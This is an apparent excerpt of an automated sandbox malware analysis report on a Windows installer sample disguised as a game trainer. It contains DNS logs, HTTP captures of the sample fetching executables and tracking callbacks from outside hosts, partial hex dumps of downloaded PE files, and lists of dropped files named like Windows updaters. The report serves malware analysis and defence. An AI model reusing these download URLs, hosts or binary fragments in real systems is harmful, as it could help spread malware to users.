Dec 6, 2023 14:52:33.580645084 CET	1.1.1.1	192.168.2.5	0x12d0	No error (0)	allroadslimit.com		104.21.74.109	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:33.580645084 CET	1.1.1.1	192.168.2.5	0x12d0	No error (0)	allroadslimit.com		172.67.157.111	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:35.666065931 CET	1.1.1.1	192.168.2.5	0x69cc	Server failure (2)	231005002055611.bcn.lca62.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:35.977354050 CET	1.1.1.1	192.168.2.5	0xeebd	No error (0)	ambadevgroup.info		37.1.198.251	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:36.069859028 CET	1.1.1.1	192.168.2.5	0x3cbb	No error (0)	dl.likeasurfer.com		172.67.150.192	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:36.069859028 CET	1.1.1.1	192.168.2.5	0x3cbb	No error (0)	dl.likeasurfer.com		104.21.32.100	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:38.650110960 CET	1.1.1.1	192.168.2.5	0x331b	No error (0)	mysoftwareusa.info		37.1.198.251	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:52.690351963 CET	1.1.1.1	192.168.2.5	0xc20c	No error (0)	tankqueueipjsh.pw		104.21.83.145	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:52.690351963 CET	1.1.1.1	192.168.2.5	0xc20c	No error (0)	tankqueueipjsh.pw		172.67.177.113	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.302489996 CET	1.1.1.1	192.168.2.5	0x476a	Name error (3)	110.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.538996935 CET	1.1.1.1	192.168.2.5	0xc394	Name error (3)	111.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.868948936 CET	1.1.1.1	192.168.2.5	0xfb4e	Name error (3)	112.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:55.084594011 CET	1.1.1.1	192.168.2.5	0x2928	Name error (3)	113.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:55.212861061 CET	1.1.1.1	192.168.2.5	0x537b	Name error (3)	114.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:55.301589012 CET	1.1.1.1	192.168.2.5	0xef4c	Name error (3)	115.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:59.403383970 CET	1.1.1.1	192.168.2.5	0x14a0	Name error (3)	110.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:59.664033890 CET	1.1.1.1	192.168.2.5	0xa1dc	Name error (3)	111.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.225112915 CET	1.1.1.1	192.168.2.5	0x4710	Name error (3)	112.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.288438082 CET	1.1.1.1	192.168.2.5	0x7fe8	Name error (3)	113.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.298340082 CET	1.1.1.1	192.168.2.5	0x8eb2	Name error (3)	115.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.305320978 CET	1.1.1.1	192.168.2.5	0x6a17	Name error (3)	114.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:16.480035067 CET	1.1.1.1	192.168.2.5	0xf522	Name error (3)	0.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:53.740021944 CET	1.1.1.1	192.168.2.5	0xc64a	No error (0)	m74b54.space		77.105.136.3	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:54.885476112 CET	1.1.1.1	192.168.2.5	0x7cd5	Name error (3)	0.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:50:47.610749006 CET	267	OUT	GET /ill.php?p=3890&t=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ==&sub=&ps=655ed8e14a15c HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: sparksteam.site
Dec 6, 2023 14:50:48.258832932 CET	916	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:50:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive X-Powered-By: PHP/5.4.16 Cache-Control: no-transform, no-cache, must-revalidate Pragma: no-cache Expires: Sat, 26 Jul 1997 05:00:00 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IR2OVzAhUNRB7mqgMFHSAlkJQZaANPe5R1p2XqrKLLyCNLWe5L8imY14y1s3XEv7Wsl25GCy95WMcfatNhhrBkMwCgzwM0cSeY1QxPAwAsbYfNPlPAU34i%2Fs5KOikV%2FqwFA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314fffbc84507b6-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 68 74 74 70 3a 2f 2f 73 69 64 65 6d 61 72 6b 2e 78 79 7a 2f 70 65 2f 62 75 69 6c 64 49 4e 2e 70 68 70 3f 73 75 62 3d 26 73 6f 75 72 63 65 3d 33 38 39 30 26 73 31 3d 34 37 36 37 30 31 30 30 26 74 69 74 6c 65 3d 63 6d 6c 32 5a 58 49 74 59 32 6c 30 65 53 31 79 61 58 5a 68 62 43 31 7a 61 47 39 33 5a 47 39 33 62 69 31 30 63 6d 46 70 62 6d 56 79 4c 54 45 31 4c 58 59 78 4c 54 67 74 4c 6d 56 34 5a 51 25 33 44 25 33 44 26 74 69 3d 31 37 30 31 38 37 30 36 34 38 Data Ascii: http://sidemark.xyz/pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701870648
Dec 6, 2023 14:50:51.420691967 CET	157	OUT	GET /pill.php HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: sparksteam.site
Dec 6, 2023 14:50:52.420404911 CET	653	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:50:52 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PY0I6Sn9BK3tdaitGimZnVZpsI1tC%2BJZIbjZotqzJbESelL2GlzXF7GibjK0kV8hK1DJIT6hbE2ACoR6DhFeLZfle1ixl0cvJIznA%2BTWKcP%2FZTO4jSNXk5au4pS0nJGGhm4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83150013ab4807b6-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 6f 6b Data Ascii: ok

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:50:48.518280029 CET	278	OUT	GET /pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701870648 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: sidemark.xyz
Dec 6, 2023 14:50:50.797415972 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:50:50 GMT Content-Type: application/force-download Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.28 Content-Disposition: attachment; filename="65707c2cac250_pe.exe" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vEHDhdW2iVAFQzZPQLV70wRMlxsOaMSdEL5WmzsZiJ4eeXmlzg4caDVjiBFSaQy169qmP7u%2BntUYFkmx6bnaH3Lvw2kDjEbNgs%2Fv72oA9aiFHbtxNKPhJ6DI9D71WRs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 831500017e142009-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 31 35 61 33 0d 0a 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 18 f2 ec 63 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 52 0b 00 00 5e 01 00 00 00 00 00 ec 5e 0b 00 00 10 00 00 00 70 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 06 00 00 00 06 00 01 00 00 00 00 00 00 80 0d 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 0c 00 9a 00 00 00 00 20 0c 00 dc 0f 00 00 00 70 0c 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 22 0c 00 54 02 00 00 00 30 0c 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 39 0b 00 00 10 00 00 00 3a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 88 16 00 00 00 50 0b 00 00 18 00 00 00 3e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 37 00 00 00 70 0b 00 00 38 00 00 00 56 0b 00 00 00 00 00 00 Data Ascii: 15a3MZP@!L!This program must be run under Win32$7PELcR^^p@@@@ p`"T0.text9: `.itextP> `.data7p8V
Dec 6, 2023 14:50:50.797514915 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 6d 00 00 00 b0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 dc 0f 00 00 00 20 0c 00 00 10 00 00 00 8e 0b 00 00 00 00 00 00 00 00 Data Ascii: @.bssm.idata @.didata0@.edata@@@.tlsP.rdata]`
Dec 6, 2023 14:50:50.797566891 CET	1340	IN	Data Raw: 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 05 00 0b f4 ca 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 Data Ascii: D2@D3D4@&op_Equality@@@Left@@Right\|K&op_Inequality@@@Left@@Right\|KEmpty@@\|KCreate@@Data@BigEndian\|KCreate@@@D
Dec 6, 2023 14:50:50.797617912 CET	1340	IN	Data Raw: 00 fe ff 5e 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 5c 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 5c 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 88 1f Data Ascii: ^@MTObject&\@Create@Self$\@Free@Self)\|KDisposeOf@Self>\@InitInstance@Self@Instance/L]@CleanupInstance@Self
Dec 6, 2023 14:50:50.797667027 CET	1124	IN	Data Raw: 5d 40 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 9c 10 40 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 14 60 40 00 08 54 6f 53 74 72 69 6e 67 03 00 b8 12 40 00 08 00 02 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 40 b8 12 40 Data Ascii: ]@GetHashCode@@Self3`@ToString@@Self@@[`@SafeCallException(@@Self@ExceptObject@ExceptAddr1,`@AfterConstruction@Self10`@Befor
Dec 6, 2023 14:50:50.797717094 CET	1340	IN	Data Raw: 32 64 34 30 0d 0a 00 00 00 00 00 e6 21 40 00 08 00 00 00 b0 1f 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 d8 5c 40 00 00 00 00 00 00 00 11 56 6f 6c 61 74 69 6c 65 Data Ascii: 2d40!@@]@]@`@`@,`@0`@4`@(`@\@\@\@VolatileAttribute!@VolatileAttribute!@ @System"@$#@"@"@@]@]@`@`@,`@0`@4`@(`@\@\@\@"@D"@
Dec 6, 2023 14:50:50.797765970 CET	1340	IN	Data Raw: 00 07 41 4f 62 6a 65 63 74 02 00 02 00 b4 26 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 e8 26 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 Data Ascii: AObject&@IInterfaceFSystem&@IEnumerable&@System'@IDispatch&@FSystemD$D$D$M'@W'@a'@Fl'@
Dec 6, 2023 14:50:50.797835112 CET	1340	IN	Data Raw: 00 00 cc 10 40 00 00 00 00 00 02 05 56 54 79 70 65 02 00 cc 10 40 00 02 00 00 00 02 09 52 65 73 65 72 76 65 64 31 02 00 cc 10 40 00 04 00 00 00 02 09 52 65 73 65 72 76 65 64 32 02 00 cc 10 40 00 06 00 00 00 02 09 52 65 73 65 72 76 65 64 33 02 00 Data Ascii: @VType@Reserved1@Reserved2@Reserved3@VSmallInt@VInteger@VSingle@VDouble@VCurrency)@VDate@VOleStr@VDispatch(@
Dec 6, 2023 14:50:50.797940016 CET	1340	IN	Data Raw: 73 65 72 76 65 64 31 02 00 b4 10 40 00 04 00 00 00 02 05 56 54 79 70 65 02 00 02 00 00 00 00 00 00 d4 30 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f 00 11 40 00 01 00 00 00 00 02 00 00 f8 30 40 00 14 0a 50 54 79 70 65 54 61 Data Ascii: served1@VType0@TTypeTable@0@PTypeTable0@1@PPackageTypeInfo(1@,1@TPackageTypeInfo@TypeCount0@TypeTable@UnitCount4)@UnitNames
Dec 6, 2023 14:50:50.798049927 CET	1340	IN	Data Raw: 00 11 40 00 0c 00 00 00 02 10 45 78 63 65 70 74 69 6f 6e 41 64 64 72 65 73 73 02 00 e4 10 40 00 10 00 00 00 02 10 4e 75 6d 62 65 72 50 61 72 61 6d 65 74 65 72 73 02 00 00 00 00 00 14 00 00 00 02 14 45 78 63 65 70 74 69 6f 6e 49 6e 66 6f 72 6d 61 Data Ascii: @ExceptionAddress@NumberParametersExceptionInformation@ExceptAddr@ExceptObject%#L%(#L%@$L%$L%#L%#L%#L%#L%H$L%P#L%#L%l#L%D$L
Dec 6, 2023 14:50:50.798099041 CET	1340	IN	Data Raw: 89 04 11 c3 90 8b 48 04 8b 10 39 d1 89 11 89 4a 04 74 02 c3 90 81 e9 78 bb 4b 00 89 ca c1 e9 03 0f b6 d6 b8 fe ff ff ff d3 c0 21 04 95 f8 ba 4b 00 75 e0 b8 fe ff ff ff 89 d1 d3 c0 21 05 f4 ba 4b 00 c3 8b c0 81 ea 30 0b 00 00 c1 ea 08 81 ea ff 03 Data Ascii: H9JtxK!Ku!K0!xKQ9PAtxKKK=KuK@u%HK)JHT0g#P0r

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:11.762283087 CET	172	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:52:11.949539900 CET	513	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=utf-8 Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Set-Cookie: ASPSESSIONIDAATQDQSB=HEPHPDNDJEOGKDCOAODAMNGH; path=/ X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin strict-transport-security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN Date: Wed, 06 Dec 2023 13:52:11 GMT Content-Length: 16 Data Raw: 33 38 2e 39 30 37 32 2c 2d 37 37 2e 30 33 36 39 Data Ascii: 38.9072,-77.0369

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:12.321681976 CET	198	OUT	GET /track_inl2.php?tim=1701870636&poid=2598&p=1.25 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: send.planewool.xyz
Dec 6, 2023 14:52:12.709703922 CET	660	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CY%2BQQbgSr7%2FL7CO2LN22u%2BC6qIMI3klTLN52ViRo5l10FiwT0M9Z%2BvV03pZ6PIYB5ChK670zilyrJklWFVrKKkXFnWTC6RxK1eeiO0RKqfzjO2bPTq%2BpdmGP42tzPVBGV5ZSSHo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8315020d4e4481b1-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 33 0d 0a 6f 6b 0a 0d 0a Data Ascii: 3ok
Dec 6, 2023 14:52:12.709736109 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZmWSzgevgt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

413dee.rbf (copy)

413def.rbf (copy)

413df4.rbf (copy)

413df9.rbf (copy)

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exe

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\System Updater.msi

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\Windows Updater.exe

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\decoder.dll

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\holder0.aiph

Windows Analysis Report
ZmWSzgevgt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:12.973052979 CET	236	OUT	GET /ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=1701870636 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: false.apparelsilver.xyz
Dec 6, 2023 14:52:13.122529030 CET	654	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:13 GMT Content-Type: text/plain Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.5.38 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DcdPpzscc2aOAfVjrlOktPvG65A8k6C0ECq9EAMp%2Bzz%2FXsFv1rDl8WE95q07UW7c7SMXZlZN6NJQwJ9LE0dxhTkyifZ%2F3AlSUss3DFJwovw67UpmzKmJpB8wBzFr0ae96kXmNmw%2BtXqrWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 831502115e88577e-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 6f 6b Data Ascii: ok
Dec 6, 2023 14:52:35.062258005 CET	234	OUT	GET /ar.php?d=inno&r=offer_execution&rk=no&o=331&a=2598&dn=244&spot=2&t=1701870636 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: false.apparelsilver.xyz
Dec 6, 2023 14:52:35.184706926 CET	654	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:52:35 GMT Content-Type: text/plain Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.5.38 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pXyx8lV%2BIYKbQtZxJHcDRmzHGJkiTTCuelW5CPN6JuA%2BohUBPZis0EhkMDzkIfaSckj%2FoHYhbZYHvbjIYUWDTWP5xhxNuxPrTpfMwqwjBN1auuOIQyDUmEf3VMzak7%2B0aYT4lCcBGGiy4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8315029b6e2d577e-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 6f 6b Data Ascii: ok

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:52:13.429894924 CET	208	OUT	HEAD /installer.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: kapetownlink.com Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:52:13.615293026 CET	323	IN	HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:13 GMT Content-Type: application/octet-stream Content-Length: 4724720 Last-Modified: Mon, 24 Jul 2023 06:14:10 GMT Connection: keep-alive ETag: "64be16b2-4817f0" Accept-Ranges: bytes
Dec 6, 2023 14:52:13.616013050 CET	207	OUT	GET /installer.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: kapetownlink.com Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:52:13.801419020 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:52:13 GMT Content-Type: application/octet-stream Content-Length: 4724720 Last-Modified: Mon, 24 Jul 2023 06:14:10 GMT Connection: keep-alive ETag: "64be16b2-4817f0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 e7 ac 00 92 86 c2 53 92 86 c2 53 92 86 c2 53 41 f4 c1 52 9f 86 c2 53 41 f4 c7 52 2b 86 c2 53 41 f4 c4 52 93 86 c2 53 f0 fe c6 52 81 86 c2 53 f0 fe c1 52 8a 86 c2 53 f0 fe c7 52 fa 86 c2 53 41 f4 c6 52 88 86 c2 53 41 f4 c3 52 91 86 c2 53 41 f4 c5 52 93 86 c2 53 92 86 c3 53 4f 84 c2 53 12 ff cb 52 df 87 c2 53 12 ff 3d 53 93 86 c2 53 92 86 55 53 93 86 c2 53 12 ff c0 52 93 86 c2 53 52 69 63 68 92 86 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 fb 67 62 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 1f 00 ae 21 00 00 ee 0d 00 00 00 00 00 44 9e 19 00 00 10 00 00 00 c0 21 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2f 00 00 04 00 00 27 f7 48 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 19 2a 00 28 00 00 00 00 c0 2a 00 c0 bc 02 00 00 00 00 00 00 00 00 00 78 fc 47 00 78 1b 00 00 00 80 2d 00 18 5b 02 00 18 ab 24 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ab 24 00 18 00 00 00 a8 df 21 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 00 cc 02 00 00 18 ed 29 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f ad 21 00 00 10 00 00 00 ae 21 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 69 08 00 00 c0 21 00 00 6a 08 00 00 b2 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 8b 00 00 00 30 2a 00 00 6a 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 bc 02 00 00 c0 2a 00 00 be 02 00 00 86 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 5b 02 00 00 80 2d 00 00 5c 02 00 00 44 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSARSAR+SARSRSRSRSARSARSARSSOSRS=SSUSSRSRichSPELGgb"!D!@/'H@$(xGx-[$p$!@!)`.text!! `.rdatadi!j!@@.data0j@.rsrc**@@.reloc[-\D-@B
